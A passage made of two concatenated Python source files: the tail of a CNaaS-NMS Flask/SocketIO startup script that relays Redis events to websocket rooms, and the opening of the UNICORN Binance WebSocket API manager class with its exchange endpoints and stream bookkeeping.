except (ModuleNotFoundError, ImportError):
scheduler = Scheduler()
scheduler.start()
pmh = PluginManagerHandler()
pmh.load_plugins()
try:
with sqla_session() as session:
Joblock.clear_locks(session)
except Exception as e:
print("Unable to clear old locks from database at startup: {}".format(str(e)))
try:
with sqla_session() as session:
Job.clear_jobs(session)
except Exception as e:
print("Unable to clear jobs with invalid states: {}".format(str(e)))
return app.app
def socketio_emit(message: str, rooms: List[str]):
if not app.socketio:
return
for room in rooms:
app.socketio.emit("events", message, room=room)
def loglevel_to_rooms(levelname: str) -> List[str]:
if levelname == 'DEBUG':
return ['DEBUG']
elif levelname == 'INFO':
return ['DEBUG', 'INFO']
elif levelname == 'WARNING':
return ['DEBUG', 'INFO', 'WARNING']
elif levelname == 'ERROR':
return ['DEBUG', 'INFO', 'WARNING', 'ERROR']
elif levelname == 'CRITICAL':
return ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']
def parse_redis_event(event):
try:
# [stream, [(messageid, {datadict})]
if event[0] == "events":
return event[1][0][1]
except Exception as e:
return None
def emit_redis_event(event):
try:
if event['type'] == "log":
socketio_emit(event['message'], loglevel_to_rooms(event['level']))
elif event['type'] == "update":
socketio_emit(json.loads(event['json']), ["update_{}".format(event['update_type'])])
except Exception as e:
pass
def thread_websocket_events():
redis: StrictRedis
with redis_session() as redis:
while True:
result = redis.xread({"events": b"$"}, count=10, block=200)
for item in result:
event = parse_redis_event(item)
if not event:
continue
emit_redis_event(event)
if stop_websocket_threads:
break
if __name__ == '__main__':
# Starting via python run.py
# gevent monkey patching required if you start flask with the auto-reloader (debug mode)
monkey.patch_all()
from cnaas_nms.api import app
from cnaas_nms.db.session import redis_session
import json
t_websocket_events = threading.Thread(target=thread_websocket_events)
t_websocket_events.start()
app.socketio.run(get_app(), debug=True, host=api_settings.HOST)
stop_websocket_threads = True
t_websocket_events.join()
if 'COVERAGE' in os.environ:
save_coverage()
else:
# Starting via uwsgi
from cnaas_nms.api import app
from cnaas_nms.db.session import redis_session
import json
t_websocket_events = threading.Thread(target=thread_websocket_events)
t_websocket_events.start()
cnaas_app = get_app()
if 'COVERAGE' in os.environ:
save_coverage()
|
manager.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/manager.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.exceptions import StreamRecoveryError, UnknownExchange
from unicorn_binance_websocket_api.sockets import BinanceWebSocketApiSocket
from unicorn_binance_websocket_api.restclient import BinanceWebSocketApiRestclient
from unicorn_binance_websocket_api.restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from collections import deque
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
from typing import Optional, Union
import asyncio
import colorama
import copy
import logging
import hashlib
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import traceback
import uuid
import ujson as json
import websockets
from collections import deque
logger = logging.getLogger("unicorn_binance_websocket_api")
class BinanceWebSocketApiManager(threading.Thread):
"""
An unofficial Python API to use the Binance Websocket API`s (com+testnet, com-margin+testnet,
com-isolated_margin+testnet, com-futures+testnet, us, jex, dex/chain+testnet) in a easy, fast, flexible,
robust and fully-featured way.
This library supports two different kind of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, trbinance.com, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance/binance-spot-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.us websocket API documentation:
- https://docs.binance.us/#introduction
TRBinance.com websocket API documentation:
- https://www.trbinance.com/apidocs/#general-wss-information
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data (callback). The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer or provided to a specific callback function of
`create_stream()`! `How to read from stream_buffer!
<https://unicorn-binance-websocket-api.docs.lucit.tech/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.com-coin_futures, binance.us, trbinance.com,
jex.com, binance.org or binance.org-testnet (default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize your bot got blind.
:type enable_stream_signal_buffer: bool
:param disable_colorama: set to True to disable the use of `colorama <https://pypi.org/project/colorama/>`_
:type disable_colorama: bool
:param stream_buffer_maxlen: Set a max len for the generic `stream_buffer`. This parameter can also be used within
`create_stream()` for a specific `stream_buffer`.
:type stream_buffer_maxlen: int or None
:param process_stream_signals: Provide a function/method to process the received stream signals. The function is running inside an asyncio loop and will be
called instead of
`add_to_stream_signal_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_signal_buffer>`_
like `process_stream_data(signal_type=False, stream_id=False, data_record=False)`.
:type process_stream_signals: function
:param close_timeout_default: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection.
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/design.html?highlight=close_timeout#closing-handshake>`_
:type close_timeout_default: int
:param ping_interval_default: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior.
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websock ets>`_
:type ping_interval_default: int
:param ping_timeout_default: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior.
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_timeout_default: int
:param high_performance: Set to True makes `create_stream()` a non blocking function
:type high_performance: bool
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False,
disable_colorama=False,
stream_buffer_maxlen=None,
process_stream_signals=False,
close_timeout_default: int = 1,
ping_interval_default: int = 5,
ping_timeout_default: int = 10,
high_performance=False,
debug=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.41.0.dev"
logger.info(f"New instance of {self.get_user_agent()} on "
f"{str(platform.system())} {str(platform.release())} for exchange {exchange} started ...")
self.debug = debug
logger.info(f"Debug is {self.debug}")
if disable_colorama is not True:
logger.info(f"Initiating `colorama_{colorama.__version__}`")
colorama.init()
logger.info(f"Using `websockets_{websockets.__version__}`")
self.specific_process_stream_data = {}
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logger.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logger.info(f"Using `process_stream_data`")
if process_stream_signals is False:
# no special method to process stream signals provided, so we use add_to_stream_signal_buffer:
self.process_stream_signals = self.add_to_stream_signal_buffer
logger.info(f"Using `stream_signal_buffer`")
else:
# use the provided method to process stream signals:
self.process_stream_signals = process_stream_signals
logger.info(f"Using `process_stream_signals` ...")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-isolated_margin-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-futures":
self.websocket_base_uri = "wss://fstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-coin-futures" or self.exchange == "binance.com-coin_futures":
self.websocket_base_uri = "wss://dstream.binance.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.com-futures-testnet":
self.websocket_base_uri = "wss://stream.binancefuture.com/"
self.max_subscriptions_per_stream = 200
elif self.exchange == "binance.us":
self.websocket_base_uri = "wss://stream.binance.us:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "trbinance.com":
self.websocket_base_uri = "wss://stream-cloud.trbinance.com/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "jex.com":
self.websocket_base_uri = "wss://ws.jex.com/"
self.max_subscriptions_per_stream = 10
elif self.exchange == "binance.org":
self.websocket_base_uri = "wss://dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.org-testnet":
self.websocket_base_uri = "wss://testnet-dex.binance.org/api/"
self.max_subscriptions_per_stream = 1024
else:
# Unknown Exchange
error_msg = f"Unknown exchange '{str(self.exchange)}'! Read the docs to see a list of supported " \
f"exchanges: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/" \
f"Binance-websocket-endpoint-configuration-overview"
logger.critical(error_msg)
raise UnknownExchange(error_msg)
self.stop_manager_request = None
self.all_subscriptions_number = 0
self.binance_api_status = {'weight': None,
'timestamp': 0,
'status_code': None}
self.dex_user_address = False
self.enable_stream_signal_buffer = enable_stream_signal_buffer
self.event_loops = {}
self.frequent_checks_list = {}
self.frequent_checks_list_lock = threading.Lock()
self.receiving_speed_average = 0
self.receiving_speed_peak = {'value': 0,
'timestamp': time.time()}
self.high_performance = high_performance
self.keep_max_received_last_second_entries = 5
self.keepalive_streams_list = {}
self.last_entry_added_to_stream_buffer = 0
self.last_monitoring_check = time.time()
self.last_update_check_github = {'timestamp': time.time(),
'status': None}
self.last_update_check_github['status']: dict = None
self.last_update_check_github_check_command = {'timestamp': time.time(),
'status': None}
self.max_send_messages_per_second = 5
self.max_send_messages_per_second_reserve = 2
self.most_receives_per_second = 0
self.monitoring_api_server = False
self.monitoring_total_received_bytes = 0
self.monitoring_total_receives = 0
self.output_default = output_default
self.reconnects = 0
self.reconnects_lock = threading.Lock()
self.request_id = 0
self.request_id_lock = threading.Lock()
self.restart_requests = {}
self.restart_timeout = restart_timeout
self.ringbuffer_error = []
self.ringbuffer_error_max_size = 500
self.ringbuffer_result = []
self.ringbuffer_result_max_size = 500
self.show_secrets_in_logs = show_secrets_in_logs
self.start_time = time.time()
self.stream_buffer_maxlen = stream_buffer_maxlen
self.stream_buffer = deque(maxlen=self.stream_buffer_maxlen)
self.stream_buffer_lock = threading.Lock()
self.stream_buffer_locks = {}
self.stream_buffers = {}
self.stream_list = {}
self.stream_list_lock = threading.Lock()
self.stream_signal_buffer = deque()
self.stream_signal_buffer_lock = threading.Lock()
self.socket_is_ready = {}
self.stream_threads = {}
self.stream_threading_lock = {}
self.throw_exception_if_unrepairable = throw_exception_if_unrepairable
self.total_received_bytes = 0
self.total_received_bytes_lock = threading.Lock()
self.total_receives = 0
self.total_receives_lock = threading.Lock()
self.total_transmitted = 0
self.total_transmitted_lock = threading.Lock()
self.websocket_list = {}
self.close_timeout_default = close_timeout_default
self.ping_interval_default = ping_interval_default
self.ping_timeout_default = ping_timeout_default
self.start()
self.replacement_text = "***SECRET_REMOVED***"
self.restclient = BinanceWebSocketApiRestclient(self)
if warn_on_update and self.is_update_available():
update_msg = f"Release {self.name}_" + self.get_latest_version() + " is available, " \
"please consider updating! (Changelog: https://github.com/LUCIT-Systems-and-Development/" \
"unicorn-binance-websocket-api/blob/master/CHANGELOG.md)"
print(update_msg)
logger.warning(update_msg)
def clear_buffer(self, stream_buffer_name=False):
#self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
#self.stream_buffers[stream_buffer_name] = []
if stream_buffer_name is False:
try:
with self.stream_buffer_lock:
stream_data = self.stream_buffer = deque()
return stream_data
except IndexError:
return False
else:
try:
with self.stream_buffer_locks[stream_buffer_name]:
stream_data = self.stream_buffers[stream_buffer_name] = deque()
return stream_data
except IndexError:
return False
except KeyError:
return False
def _add_stream_to_stream_list(self,
stream_id,
channels,
markets,
stream_label=None,
stream_buffer_name=False,
api_key=False,
api_secret=False,
symbols=False,
output=False,
ping_interval=None,
ping_timeout=None,
close_timeout=None,
stream_buffer_maxlen=None,
process_stream_data=None):
"""
Create a list entry for new streams
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_label: provide a stream_label for the stream
:type stream_label: str
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param api_key: provide a valid Binance API key
:type api_key: str
:param api_secret: provide a valid Binance API secret
:type api_secret: str
:param symbols: provide the symbols for isolated_margin user_data streams
:type symbols: str
:param output: the default setting `raw_data` can be globaly overwritten with the parameter
`output_default <https://unicorn-binance-websocket-api.docs.lucit.tech/unicorn_binance_websocket_api.html?highlight=output_default#module-unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager>`_
of BinanceWebSocketApiManager`. To overrule the `output_default` value for this specific stream,
set `output` to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/LUCIT-Systems-and-Development/unicorn-fy>`_ - otherwise with
the default setting "raw_data" the output remains unchanged and gets delivered as received from
the endpoints
:type output: str
:param ping_interval: Once the connection is open, a `Ping frame` is sent every
`ping_interval` seconds. This serves as a keepalive. It helps keeping
the connection open, especially in the presence of proxies with short
timeouts on inactive connections. Set `ping_interval` to `None` to
disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_interval: int or None
:param ping_timeout: If the corresponding `Pong frame` isn't received within
`ping_timeout` seconds, the connection is considered unusable and is closed with
code 1011. This ensures that the remote endpoint remains responsive. Set
`ping_timeout` to `None` to disable this behavior. (default: 20)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/timeouts.html?highlight=ping_interval#keepalive-in-websockets>`_
:type ping_timeout: int or None
:param close_timeout: The `close_timeout` parameter defines a maximum wait time in seconds for
completing the closing handshake and terminating the TCP connection. (default: 10)
This parameter is passed through to the `websockets.client.connect()
<https://websockets.readthedocs.io/en/stable/topics/design.html?highlight=close_timeout#closing-handshake>`_
:type close_timeout: int or None
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://unicorn-binance-websocket-api.docs.lucit.tech/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
"""
output = output or self.output_default
close_timeout = close_timeout or self.close_timeout_default
ping_interval = ping_interval or self.ping_interval_default
ping_timeout = ping_timeout or self.ping_timeout_default
self.specific_process_stream_data[stream_id] = process_stream_data
self.stream_threading_lock[stream_id] = {'full_lock': threading.Lock(),
'receives_statistic_last_second_lock': threading.Lock()}
self.stream_list[stream_id] = {'exchange': self.exchange,
'stream_id': copy.deepcopy(stream_id),
'recent_socket_id': None,
'channels': copy.deepcopy(channels),
'markets': copy.deepcopy(markets),
'stream_label': copy.deepcopy(stream_label),
'stream_buffer_name': copy.deepcopy(stream_buffer_name),
'stream_buffer_maxlen': copy.deepcopy(stream_buffer_maxlen),
'symbols': copy.deepcopy(symbols),
'output': copy.deepcopy(output),
'subscriptions': 0,
'payload': [],
'api_key': copy.deepcopy(api_key),
'api_secret': copy.deepcopy(api_secret),
'dex_user_address': copy.deepcopy(self.dex_user_address),
'ping_interval': copy.deepcopy(ping_interval),
'ping_timeout': copy.deepcopy(ping_timeout),
'close_timeout': copy.deepcopy(close_timeout),
'status': 'starting',
'start_time': time.time(),
'processed_receives_total': 0,
'receives_statistic_last_second': {'most_receives_per_second': 0, 'entries': {}},
'seconds_to_last_heartbeat': None,
'last_heartbeat': None,
'stop_request': None,
'crash_request': None,
'kill_request': None,
'seconds_since_has_stopped': None,
'has_stopped': False,
'reconnects': 0,
'last_stream_signal': None,
'logged_reconnects': [],
'processed_transmitted_total': 0,
'last_static_ping_listen_key': 0,
'listen_key': False,
'listen_key_cache_time': 30 * 60,
'last_received_data_record': None,
'processed_receives_statistic': {},
'transfer_rate_per_second': {'bytes': {}, 'speed': 0}}
logger.info("BinanceWebSocketApiManager._add_stream_to_stream_list(" +
str(stream_id) + ", " + str(channels) + ", " + str(markets) + ", " + str(stream_label) + ", "
+ str(stream_buffer_name) + ", " + str(stream_buffer_maxlen) + ", " + str(symbols) + ")")
def _create_stream_thread(self,
loop,
stream_id,
channels,
markets,
stream_buffer_name=False,
stream_buffer_maxlen=None,
restart=False):
"""
Co function of self.create_stream to create a thread for the socket and to manage the coroutine
:param loop: provide a asynio loop
:type loop: asyncio loop
:param stream_id: provide a stream_id (only needed for userData Streams (acquiring a listenKey)
:type stream_id: str
:param channels: provide the channels to create the URI
:type channels: str, tuple, list, set
:param markets: provide the markets to create the URI
:type markets: str, tuple, list, set
:param stream_buffer_name: If `False` the data is going to get written to the default stream_buffer,
set to `True` to read the data via `pop_stream_data_from_stream_buffer(stream_id)` or
provide a string to create and use a shared stream_buffer and read it via
`pop_stream_data_from_stream_buffer('string')`.
:type stream_buffer_name: bool or str
:param stream_buffer_maxlen: Set a max len for the `stream_buffer`. Only used in combination with a non generic
`stream_buffer`. The generic `stream_buffer` uses always the value of
`BinanceWebSocketApiManager()`.
:type stream_buffer_maxlen: int or None
:param restart: set to `True`, if its a restart!
:type restart: bool
:return:
"""
if self.is_stop_request(stream_id):
return False
if restart is False:
if stream_buffer_name is not False:
self.stream_buffer_locks[stream_buffer_name] = threading.Lock()
try:
# Not resetting the stream_buffer during a restart:
if self.stream_buffers[stream_buffer_name]:
pass
except KeyError:
# Resetting
self.stream_buffers[stream_buffer_name] = deque(maxlen=stream_buffer_maxlen)
asyncio.set_event_loop(loop)
socket = BinanceWebSocketApiSocket(self, stream_id, channels, markets)
try:
loop.run_until_complete(socket.start_socket())
except RuntimeError as error_msg:
if "cannot schedule new futures after interpreter shutdown" in str(error_msg):
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError `error: 11` - error_msg: {str(error_msg)} - Please create an issue: "
f"https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/"
f"issues/new/choose")
self.stop_manager_with_all_streams()
sys.exit(1)
elif "This event loop is already running" in str(error_msg):
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError - error_msg: {str(error_msg)}")
else:
logger.critical(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} "
f" - RuntimeError `error: 7` - error_msg: {str(error_msg)} - Please create an issue: "
f"https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/"
f"new/choose")
finally:
try:
if self.stream_list[stream_id]['last_stream_signal'] is not None and \
self.stream_list[stream_id]['last_stream_signal'] != "DISCONNECT":
self.process_stream_signals("DISCONNECT", stream_id)
self.stream_list[stream_id]['last_stream_signal'] = "DISCONNECT"
except KeyError as error_msg:
logger.debug(f"BinanceWebSocketApiManager._create_stream_thread() stream_id={str(stream_id)} - "
f"KeyError `error: 12` - {error_msg}")
loop.close()
self.set_socket_is_ready(stream_id)
def _frequent_checks(self):
"""
This method gets started as a thread and is doing the frequent checks
"""
frequent_checks_id = time.time()
cpu_usage_time = False
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id] = {'last_heartbeat': 0,
'stop_request': None,
'has_stopped': False}
logger.info("BinanceWebSocketApiManager._frequent_checks() new instance created with frequent_checks_id=" +
str(frequent_checks_id))
# threaded loop for min 1 check per second
while self.stop_manager_request is None and self.frequent_checks_list[frequent_checks_id]['stop_request'] \
is None:
with self.frequent_checks_list_lock:
self.frequent_checks_list[frequent_checks_id]['last_heartbeat'] = time.time()
time.sleep(0.3)
current_timestamp = int(time.time())
last_timestamp = current_timestamp - 1
next_to_last_timestamp = current_timestamp - 2
total_most_stream_receives_last_timestamp = 0
total_most_stream_receives_next_to_last_timestamp = 0
active_stream_list = self.get_active_stream_list()
# check CPU stats
cpu = self.get_process_usage_cpu()
if cpu >= 95:
time_of_waiting = 5
if cpu_usage_time is False:
cpu_usage_time = time.time()
elif (time.time() - cpu_usage_time) > time_of_waiting:
logger.warning(f"BinanceWebSocketApiManager._frequent_checks() - High CPU usage since "
f"{str(time_of_waiting)} seconds: {str(cpu)}")
cpu_usage_time = False
else:
cpu_usage_time = False
# count most_receives_per_second total last second
if active_stream_list:
for stream_id in active_stream_list:
# set the streams `most_receives_per_second` value
try:
if self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp] > \
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']:
self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second'] = \
self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_timestamp]
except KeyError:
pass
try:
total_most_stream_receives_next_to_last_timestamp += self.stream_list[stream_id]['receives_statistic_last_second']['entries'][next_to_last_timestamp]
except KeyError:
pass
# delete list entries older than `keep_max_received_last_second_entries`
# receives_statistic_last_second
delete_index = []
if len(self.stream_list[stream_id]['receives_statistic_last_second']['entries']) > \
self.keep_max_received_last_second_entries:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
temp_entries = copy.deepcopy(self.stream_list[stream_id]['receives_statistic_last_second']['entries'])
for timestamp_key in temp_entries:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error("BinanceWebSocketApiManager._frequent_checks() timestamp_key=" +
str(timestamp_key) + " current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_entries=" +
str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
for timestamp_key in delete_index:
with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
self.stream_list[stream_id]['receives_statistic_last_second']['entries'].pop(timestamp_key,
None)
# transfer_rate_per_second
delete_index = []
if len(self.stream_list[stream_id]['transfer_rate_per_second']['bytes']) > \
self.keep_max_received_last_second_entries:
try:
temp_bytes = self.stream_list[stream_id]['transfer_rate_per_second']['bytes']
for timestamp_key in temp_bytes:
try:
if timestamp_key < current_timestamp - self.keep_max_received_last_second_entries:
delete_index.append(timestamp_key)
except ValueError as error_msg:
logger.error(
"BinanceWebSocketApiManager._frequent_checks() timestamp_key="
+ str(timestamp_key) +
" current_timestamp=" + str(current_timestamp) +
" keep_max_received_last_second_"
"entries=" + str(self.keep_max_received_last_second_entries) + " error_msg=" +
str(error_msg))
except RuntimeError as error_msg:
logger.info("BinanceWebSocketApiManager._frequent_checks() - "
"Catched RuntimeError: " + str(error_msg))
for timestamp_key in delete_index:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'].pop(timestamp_key, None)
# set most_receives_per_second
try:
if int(self.most_receives_per_second) < int(total_most_stream_receives_last_timestamp):
self.most_receives_per_second = int(total_most_stream_receives_last_timestamp)
except ValueError as error_msg:
logger.error("BinanceWebSocketApiManager._frequent_checks() self.most_receives_per_second"
"=" + str(self.most_receives_per_second) + " total_most_stream_receives_last_timestamp"
"=" + str(total_most_stream_receives_last_timestamp) + " total_most_stream_receives_next_"
"to_last_timestamp=" + str(total_most_stream_receives_next_to_last_timestamp) + " error_"
"msg=" + str(error_msg))
# check receiving_speed_peak
last_second_receiving_speed = self.get_current_receiving_speed_global()
try:
if last_second_receiving_speed > self.receiving_speed_peak['value']:
self.receiving_speed_peak['value'] = last_second_receiving_speed
self.receiving_speed_peak['timestamp'] = time.time()
logger.info(f"BinanceWebSocketApiManager._frequent_checks() - reached new "
f"`highest_receiving_speed` "
f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} at "
f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])}")
except TypeError as error_msg:
pass
# send keepalive for `!userData` streams every 30 minutes
if active_stream_list:
for stream_id in active_stream_list:
if isinstance(active_stream_list[stream_id]['markets'], str):
active_stream_list[stream_id]['markets'] = [active_stream_list[stream_id]['markets'], ]
if isinstance(active_stream_list[stream_id]['channels'], str):
active_stream_list[stream_id]['channels'] = [active_stream_list[stream_id]['channels'], ]
if "!userData" in active_stream_list[stream_id]['markets'] or \
"!userData" in active_stream_list[stream_id]['channels']:
if (active_stream_list[stream_id]['start_time'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time() and \
(active_stream_list[stream_id]['last_static_ping_listen_key'] +
active_stream_list[stream_id]['listen_key_cache_time']) < time.time():
# keep-alive the listenKey
self.restclient.keepalive_listen_key(stream_id)
# set last_static_ping_listen_key
self.stream_list[stream_id]['last_static_ping_listen_key'] = time.time()
self.set_heartbeat(stream_id)
logger.info("BinanceWebSocketApiManager._frequent_checks() - sent listen_key keepalive "
"ping for stream_id=" + str(stream_id))
sys.exit(0)
def _handle_task_result(self, task: asyncio.Task) -> None:
"""
This method is a callback for `loop.create_task()` to retrive the task exception and avoid the `Task exception
was never retrieved` traceback on stdout:
https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/issues/261
"""
try:
task.result()
except asyncio.CancelledError:
logger.debug(f"BinanceWebSocketApiManager._handle_task_result() - asyncio.CancelledError raised by task "
